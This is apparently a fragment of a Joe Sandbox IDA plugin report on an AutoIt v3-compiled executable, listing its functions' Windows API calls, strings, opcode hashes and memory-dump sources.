                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 420147892-0
                                                      • Opcode ID: 7c7534f80c0865d2cb1e50a963b3efdfaeccc02b49758cb15804d499fabad520
                                                      • Instruction ID: 56270a24621e1fee3b14c044215df2833af38ec5019fbe0ab60bf1f78e7c0637
                                                      • Opcode Fuzzy Hash: 7c7534f80c0865d2cb1e50a963b3efdfaeccc02b49758cb15804d499fabad520
                                                      • Instruction Fuzzy Hash: 8531B471108341AFD305EF50E885AAFBBE9BFA9350F00052DF585C21A1EF719A49CB52
                                                      APIs
                                                        • Part of subcall function 00133740: CharUpperBuffW.USER32(?,001E71DC,00000000,?,00000000,001E71DC,?,001253A5,?,?,?,?), ref: 0013375D
                                                      • _memmove.LIBCMT ref: 0012B68A
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper_memmove
                                                      • String ID:
                                                      • API String ID: 2819905725-0
                                                      • Opcode ID: e15ef58b7448866ac946596cb5d012716623ca6f2806142bb474cff24b036734
                                                      • Instruction ID: b3b727136f021b6dbe70c0259c2147812295fdfd83c46aec75efb6f27ff52919
                                                      • Opcode Fuzzy Hash: e15ef58b7448866ac946596cb5d012716623ca6f2806142bb474cff24b036734
                                                      • Instruction Fuzzy Hash: 0FA299706083519FD724CF14D480B2AB7E1FF98304F15896DE8AA8B361D771EDA5CB92
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,0016FC86), ref: 0018495A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0018496B
                                                      • FindClose.KERNEL32(00000000), ref: 0018497B
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: 2b5f93adcecc5115efb18e715dfe261a208ea7a6600cee521521669ba820e41e
                                                      • Instruction ID: d4e01a2edcbac36b6a68278123aacb73224542a8588f7276c9492a91852991f8
                                                      • Opcode Fuzzy Hash: 2b5f93adcecc5115efb18e715dfe261a208ea7a6600cee521521669ba820e41e
                                                      • Instruction Fuzzy Hash: B1E0DF31810606AB9224BB3CEC0D8EBB75C9F0E339F100719F835C24E0EB70DA848B96
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 415409aaa1bc5ce2c8d74f3d5140c958f6920bc11b3d524512ddbd8dac9ab42c
                                                      • Instruction ID: 2ad136b7d585df10375b3aa765bf2c0ff570b8b940398c76f58b3952e5dbaaa6
                                                      • Opcode Fuzzy Hash: 415409aaa1bc5ce2c8d74f3d5140c958f6920bc11b3d524512ddbd8dac9ab42c
                                                      • Instruction Fuzzy Hash: 4922B170A0422ADFDB14DF58E890ABEB7F0FF19310F158169E845AB351E334AD95CB91
                                                      APIs
                                                      • timeGetTime.WINMM ref: 0012BF57
                                                        • Part of subcall function 001252B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001252E6
                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 001636B5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessagePeekSleepTimetime
                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                      • API String ID: 1792118007-922114024
                                                      • Opcode ID: 58daa8c078ffa468d0ef6e8423b6f4d69728bdb2c9c58b7a31e5a7a12a15b939
                                                      • Instruction ID: ec7b75653a4d1fa9ecec9f82d59fb8da7f77bea13c3dfed498fec0997baf60b3
                                                      • Opcode Fuzzy Hash: 58daa8c078ffa468d0ef6e8423b6f4d69728bdb2c9c58b7a31e5a7a12a15b939
                                                      • Instruction Fuzzy Hash: 17C2CC70608351DFD728DF24D884BAEB7E5BF94304F14891DF59A872A1CB71E9A4CB82
                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00123444
                                                      • RegisterClassExW.USER32(00000030), ref: 0012346E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0012347F
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 0012349C
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001234AC
                                                      • LoadIconW.USER32(000000A9), ref: 001234C2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001234D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: ec70ee4c154d44b5b3cea98c9c1f366f9c8a24b11f4d862035186258de299d5a
                                                      • Instruction ID: 44352bf5de4e6293c692a8bf26bb1eef4a5eebd360e0573e4cb85a16d382934a
                                                      • Opcode Fuzzy Hash: ec70ee4c154d44b5b3cea98c9c1f366f9c8a24b11f4d862035186258de299d5a
                                                      • Instruction Fuzzy Hash: 66312B71844349AFEB42DFE4EC89ACEBBF0FB19310F10465AE590EA6A0D7B55581CF50
                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00123444
                                                      • RegisterClassExW.USER32(00000030), ref: 0012346E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0012347F
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 0012349C
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001234AC
                                                      • LoadIconW.USER32(000000A9), ref: 001234C2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001234D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 97b863ae6a67c34c4e2f723a0d3c970c349af7708d5f2d8e4521c4149a70f1ae
                                                      • Instruction ID: 9a59052fe7d1a50dce9d4b91b0b9351a438474dcd05d0be47865e10e36adc4df
                                                      • Opcode Fuzzy Hash: 97b863ae6a67c34c4e2f723a0d3c970c349af7708d5f2d8e4521c4149a70f1ae
                                                      • Instruction Fuzzy Hash: EA21E4B1904259AFEB01DFE4EC89B9EBBF4FB08700F10421AF514AA6A0D7B15580CF91
                                                      APIs
                                                        • Part of subcall function 001400CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00133094), ref: 001400ED
                                                        • Part of subcall function 001408C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0013309F), ref: 001408E3
                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001330E2
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001701BA
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001701FB
                                                      • RegCloseKey.ADVAPI32(?), ref: 00170239
                                                      • _wcscat.LIBCMT ref: 00170292
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 2673923337-2727554177
                                                      • Opcode ID: de96e872ea00809dac9194f12066a8763bdcfce746b9cac69630fa903f01de9c
                                                      • Instruction ID: 89ea8143eee38bfc47a4605e554e5cb5b963498680c26d980ae7f0e7676f936d
                                                      • Opcode Fuzzy Hash: de96e872ea00809dac9194f12066a8763bdcfce746b9cac69630fa903f01de9c
                                                      • Instruction Fuzzy Hash: F9715B71409742AEC305EFA5D8819AFBBF8FF58340F40452EF6499B1A1EF309988CB52
                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00135156
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00135165
                                                      • LoadIconW.USER32(00000063), ref: 0013517C
                                                      • LoadIconW.USER32(000000A4), ref: 0013518E
                                                      • LoadIconW.USER32(000000A2), ref: 001351A0
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001351C6
                                                      • RegisterClassExW.USER32(?), ref: 0013521C
                                                        • Part of subcall function 00123411: GetSysColorBrush.USER32(0000000F), ref: 00123444
                                                        • Part of subcall function 00123411: RegisterClassExW.USER32(00000030), ref: 0012346E
                                                        • Part of subcall function 00123411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0012347F
                                                        • Part of subcall function 00123411: InitCommonControlsEx.COMCTL32(?), ref: 0012349C
                                                        • Part of subcall function 00123411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001234AC
                                                        • Part of subcall function 00123411: LoadIconW.USER32(000000A9), ref: 001234C2
                                                        • Part of subcall function 00123411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001234D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 08865160daa94b9d04611abadcc4aacf25817be4946f2869a1598acc383420ff
                                                      • Instruction ID: 1ae3b8a6651d6c3d344e125bb37841462e137a0d06c1bad62918160225bdfb87
                                                      • Opcode Fuzzy Hash: 08865160daa94b9d04611abadcc4aacf25817be4946f2869a1598acc383420ff
                                                      • Instruction Fuzzy Hash: FD217C70D04349AFEB119FE4ED89B9EBBB4FB18710F000159F604AA6E0C7B55590CF80
                                                      APIs
                                                      • WSAStartup.WS2_32(00000101,?), ref: 00195E7E
                                                      • inet_addr.WSOCK32(?,?,?), ref: 00195EC3
                                                      • gethostbyname.WS2_32(?), ref: 00195ECF
                                                      • IcmpCreateFile.IPHLPAPI ref: 00195EDD
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00195F4D
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00195F63
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00195FD8
                                                      • WSACleanup.WSOCK32 ref: 00195FDE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: 078bbbe07226232d5a31f91f6d189e47c1d5a21558c42b530295ec74d73f1e34
                                                      • Instruction ID: 85003aa92b8cb31fe0661eaed9d35ea1152a2f6911dd7be3072b8f7e73ee920c
                                                      • Opcode Fuzzy Hash: 078bbbe07226232d5a31f91f6d189e47c1d5a21558c42b530295ec74d73f1e34
                                                      • Instruction Fuzzy Hash: 9C51A2316047019FDB22EF24DC49B2AB7E5EF48720F144529F999EB2A1DB70ED40CB42
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00134E22
                                                      • KillTimer.USER32(?,00000001), ref: 00134E4C
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00134E6F
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00134E7A
                                                      • CreatePopupMenu.USER32 ref: 00134E8E
                                                      • PostQuitMessage.USER32(00000000), ref: 00134EAF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: 992076fa9541dad0ba590c3130218f05a52641774f5c74b3b142a933e515ba08
                                                      • Instruction ID: 955e5bc0d8cc5ff2fd198e1b8b05a0d70a8488faa2004be11cdc89e3572fa3ac
                                                      • Opcode Fuzzy Hash: 992076fa9541dad0ba590c3130218f05a52641774f5c74b3b142a933e515ba08
                                                      • Instruction Fuzzy Hash: 2741383120828AEBFB166F64EC4DBBF76A5F758300F040235F645965E1DB78BC909761
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00170C5B
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      • _memset.LIBCMT ref: 00135787
                                                      • _wcscpy.LIBCMT ref: 001357DB
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001357EB
                                                      • __swprintf.LIBCMT ref: 00170CD1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                                      • String ID: Line %d: $AutoIt -
                                                      • API String ID: 230667853-4094128768
                                                      • Opcode ID: 4c5d475670cae8f5711447b69efb2c4c1a081ee4063ea3323cb7c87fc265f179
                                                      • Instruction ID: d8bd69d97227e7541cd5705b907b193799f9af7a95c4c459cb23a399e4ece7af
                                                      • Opcode Fuzzy Hash: 4c5d475670cae8f5711447b69efb2c4c1a081ee4063ea3323cb7c87fc265f179
                                                      • Instruction Fuzzy Hash: CB41A571008305AAD722EB60DC85FEF77ECAF68754F10461EF189921E1EB70A649CB96
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00135109
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0013512A
                                                      • ShowWindow.USER32(00000000), ref: 0013513E
                                                      • ShowWindow.USER32(00000000), ref: 00135147
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: c8b96d42bf30c53fb7b79b423fc8e4ccbeb9b0e2a3a725e35412635fa1a9a921
                                                      • Instruction ID: b3d778b307009eb3a641c34f5cb1ee7752f1688217961dc24f627ce76caed2df
                                                      • Opcode Fuzzy Hash: c8b96d42bf30c53fb7b79b423fc8e4ccbeb9b0e2a3a725e35412635fa1a9a921
                                                      • Instruction Fuzzy Hash: 23F0B7715452957AFA222B676C88E6B7E7DD7CAF50F00011ABA04AA5A0C7611891DAB0
                                                      APIs
                                                        • Part of subcall function 00134A8C: _fseek.LIBCMT ref: 00134AA4
                                                        • Part of subcall function 00189CF1: _wcscmp.LIBCMT ref: 00189DE1
                                                        • Part of subcall function 00189CF1: _wcscmp.LIBCMT ref: 00189DF4
                                                      • _free.LIBCMT ref: 00189C5F
                                                      • _free.LIBCMT ref: 00189C66
                                                      • _free.LIBCMT ref: 00189CD1
                                                        • Part of subcall function 00142F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00149C54,00000000,00148D5D,001459C3), ref: 00142F99
                                                        • Part of subcall function 00142F85: GetLastError.KERNEL32(00000000,?,00149C54,00000000,00148D5D,001459C3), ref: 00142FAB
                                                      • _free.LIBCMT ref: 00189CD9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                      • API String ID: 1552873950-2806939583
                                                      • Opcode ID: 4d692006f9789f6892126afa155f0bf7d8c8c90fff29cb7e9a48e3afbe1d8126
                                                      • Instruction ID: 094bdfce3e484bf51cd108a087c40bf1d981b3955433a9d22590db7b120d2dfc
                                                      • Opcode Fuzzy Hash: 4d692006f9789f6892126afa155f0bf7d8c8c90fff29cb7e9a48e3afbe1d8126
                                                      • Instruction Fuzzy Hash: A2513BB1D04219AFDF24EF64DC81AAEBBB9FF48304F10049EF649A3251DB715A848F58
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                      • String ID:
                                                      • API String ID: 1559183368-0
                                                      • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                      • Instruction ID: 4fa914d2777cff82ed485fbfca143469a45135d91423b3a96f363e249250eaf2
                                                      • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                      • Instruction Fuzzy Hash: A051C330A00B05DBDB288FA9C88066E77B7EF50325FA58739F835962F2D7709D519B50
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001252E6
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0012534A
                                                      • TranslateMessage.USER32(?), ref: 00125356
                                                      • DispatchMessageW.USER32(?), ref: 00125360
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Message$Peek$DispatchTranslate
                                                      • String ID:
                                                      • API String ID: 1795658109-0
                                                      • Opcode ID: 3bea7a1c9495c364d8b4800a4394bd569f9c437ad4dfb187295095bcad492ba5
                                                      • Instruction ID: 093785d8eb6f9051a69533bb7622a5697535881395d49a7414fe54a5d6a774dc
